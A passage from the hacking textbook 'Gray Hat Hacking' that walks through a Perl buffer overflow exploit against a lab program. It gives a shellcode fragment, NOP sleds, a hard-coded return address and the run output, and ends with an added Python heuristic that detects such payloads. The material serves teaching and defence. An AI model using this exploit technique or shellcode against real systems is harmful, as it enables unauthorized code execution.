
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"


"\xb2\x5e\x5c\x6f\xd2\x16\x2d\x9f\x33\x5d\x15\xa3\x3d\xdd\x61\x24".
"\xc6\x81\xc0\x24\xde\x95\x86\xa6\x3d\x1d\xdd\xaf\xb6\x9d\xe6\xc7".
"\x8a\xc2\x5c\x59\xd6\xcb\xe4\x57\x35\x5d\x16\xff\xde\x72\xa3\x4f".
"\xd6\xf5\xf5\x51\x3c\x93\x3a\x50\x51\xfe\x0c\xc3\xd5\xb3\x08\xd7".
"\xd3\x9d\x6d\xaf";
# get_sp gave us 0x12ff60. Subtract 0x198 for buffer of 408 bytes
my $return_address = "\xC8\xFD\x12\x00";
my $nop_before = "\x90" x 24;
my $nop_after = "\x90" x 216;
my $payload = $nop_before.$shellcode.$nop_after.$return_address;
exec 'meet','Mr.',$payload
Notice that we have added thread-safe shellcode, regenerated from the Metasploit site.
C:\grayhat>Perl command.pl
C:\grayhat>Hello Mr. nV
Bye Mr. nV
… truncated for brevity …
The calculator popped up this time (without a crash): success! To slow it down a bit
and gain experience with the debugger, change the last line of the script to:
exec 'c:\\debuggers\\ntsd', '-g', '-G', 'meet', 'Mr.', $payload;
Now start the program again.
C:\grayhat>Perl command.pl
NOTE If your debugger is not installed in c:\debuggers, you'll need to change
the exec line in your script.
Voilà! Calc.exe pops up again after the debugger runs in the background.
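From the detection side, the payload layout shown above (24 NOPs, shellcode, 216 NOPs, a 4-byte little-endian return address just below the stack pointer that get_sp reported) is a recognizable signature in a crash dump or captured argument. The following Python is an added example, not code from the book; the sample argument is constructed here with placeholder bytes in place of the shellcode, and the stack-pointer value 0x12ff60 and the 0x1000 window are taken from the page and assumed, respectively.

```python
import struct

# Constructed sample mirroring the page's layout: 24 NOPs, a stand-in for the
# shellcode (164 placeholder bytes, an assumption; they execute nothing),
# 216 NOPs, then 0x0012fdc8 packed little-endian.
FAKE_SHELLCODE = bytes(range(1, 165))
SAMPLE_ARG = (b"\x90" * 24 + FAKE_SHELLCODE + b"\x90" * 216
              + struct.pack("<I", 0x0012FDC8))


def longest_nop_run(data: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of single-byte NOPs (0x90 on x86)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == nop else 0
        best = max(best, cur)
    return best


def trailing_address(data: bytes):
    """Decode the final four bytes as a little-endian 32-bit pointer,
    or None when the input is too short to carry one."""
    if len(data) < 4:
        return None
    return struct.unpack("<I", data[-4:])[0]


def looks_like_stack_smash(data: bytes, stack_pointer: int = 0x0012FF60,
                           window: int = 0x1000, min_sled: int = 16) -> dict:
    """Heuristic check: a long NOP sled plus a trailing pointer that lands
    within `window` bytes below the stack pointer seen in the debugger."""
    sled = longest_nop_run(data)
    addr = trailing_address(data)
    in_window = addr is not None and stack_pointer - window <= addr <= stack_pointer
    return {"sled": sled, "return_address": addr,
            "suspicious": sled >= min_sled and in_window}


if __name__ == "__main__":
    print(looks_like_stack_smash(SAMPLE_ARG))   # sled 216, address 0x12fdc8
    print(looks_like_stack_smash(b"Mr."))       # ordinary argument, not suspicious
```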

